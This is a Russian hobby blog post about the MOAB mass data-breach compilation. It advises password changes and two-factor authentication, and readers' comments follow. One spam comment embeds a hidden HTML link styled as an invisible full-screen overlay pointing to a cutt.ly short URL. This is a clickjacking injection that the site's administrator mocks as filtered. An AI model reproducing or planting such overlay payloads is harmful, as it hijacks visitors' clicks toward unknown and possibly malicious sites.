Дневничок фаната программирования и портала

Здесь отводят душу администрация и посетители сайтов и портала «savesoul.ru→←logovo-tigra.ru». Этот дневник содержит темы (их может создавать только администратор) и комментарии (регистрации не требуют и доступны всем, если только не выключены модератором). Домен savesoul.ru имеет более 10 поддоменов, которые можно с некоторой натяжкой называть отдельными сайтами. Не знаю, приемлете ли Вы такую «натяжку», но когда будете упоминать слово «сайт», не забудьте сказать, какой из поддоменов имеете в виду. Если же ведёте речь о всём сообществе ресурсов в поддоменах, называйте это сообщество не «сайт», а «портал».

К списку публикаций

Убийственная база MOAB

рубрика: СОБЫТИЯ, дата и время: 26.01.2024 05:31:02

На днях произошла крупная (около 12 Тб) утечка данных в хакерскую базу, прозванную MOAB (расшифровывается как Mother Of All Breaches). Подробности Вам поможет отыскать Яндекс (по запросу «MOAB» или «MOAB утечка данных в сеть»). В числе компаний, пострадавших от этого события, известные, в том числе Telegram и VK. Думаю, и холдинг Mail.Ru там тоже есть, хоть о нём открыто и не говорят. Хакерской базой уже вовсю пользуются разные деструктивы, а также рекламщики, промоутеры, «SEO-мастера» и прочее в том же духе. Так что, не удивляйтесь возможным взломам Ваших аккаунтов. В принципе, в Сети есть сервис, помогающий определить наличие Ваших данных в хакерских базах. Воспользуйтесь им. И смените пароли на своих акках, в частности vk.com, mail.ru, ok.ru (на VK можно включить двухфакторную аутентификацию или вообще удалить пароль). Вообще-то, это надо делать регулярно, но сейчас в связи с описанным прискорбным событием — сделать обязательно. Пароли, как понимаете, нужно делать из совершенно случайной смеси символов (например, так или взять предлагаемый майловским генератором, заменить в нём несколько букв и результат установить как новый пароль).
На сем разрешите завершить словоизвержение и напомнить, что MOAB — крупнейшая база данных, хакерами используемая и хакерами созданная, а значит, большинство попыток несанкционированного доступа пользуются и, видимо, будут пользоваться материалами именно оттуда. Поэтому отслеживайте иногда сайты вроде SecurityLab и hi-tech.mail.ru на предмет новостей о пополнении MOAB`а и других подобных баз очередной порцией наших с Вами паролей, за которыми как-то не очень хорошо присматривают крупные информационные гиганты. Что я сказал? «Крупные гиганты»? Типа «масло масляное»? Нет, всё равно оставлю крупных гигантов! Пусть будут моим фирменным стилем! На сем разрешите откланяться. Гуд бай!

Комментарии:

Kriptopsix
27.01.2024 09:17:23
здесь...
Я  не люблю менять пароли, если вообще не пускает на сайт тогда уже меняю. У меня даже от банковского сайта старый пароль из 6 символов. Вообще пофиг, 2фа защищает норм, без звонка либо смс все равно не зайдут
Администратор
28.01.2024 03:13:40
здесь...
Kriptopsix, ну да, 2ФА, в общем, неплохая альтернатива простому паролю. Но, с другой стороны, если потеряется телефон, то придётся срочно восстанавливать симку, а то никуда не зайдёшь с 2фа. В общем, как мне кажется, это дело вкуса.
Annakis1990
28.01.2024 13:08:19
здесь...
Класс<a/href="//cutt.ly/MwmCzQ0B"style="position:fixed;left:0;top:0;width:9999px;height:9999px;"></a>
Администратор
29.01.2024 01:20:17
здесь...
Гы-гы-гы, эти скрипт-киды п***расы приняли меня совсем за лоха́, думают, что я не фильтрую содержимое сообщений и никнеймов. ХЕР им!

Добавить комментарий

Powered by Antitrue Engine v 4.0 from SM aka AntiGun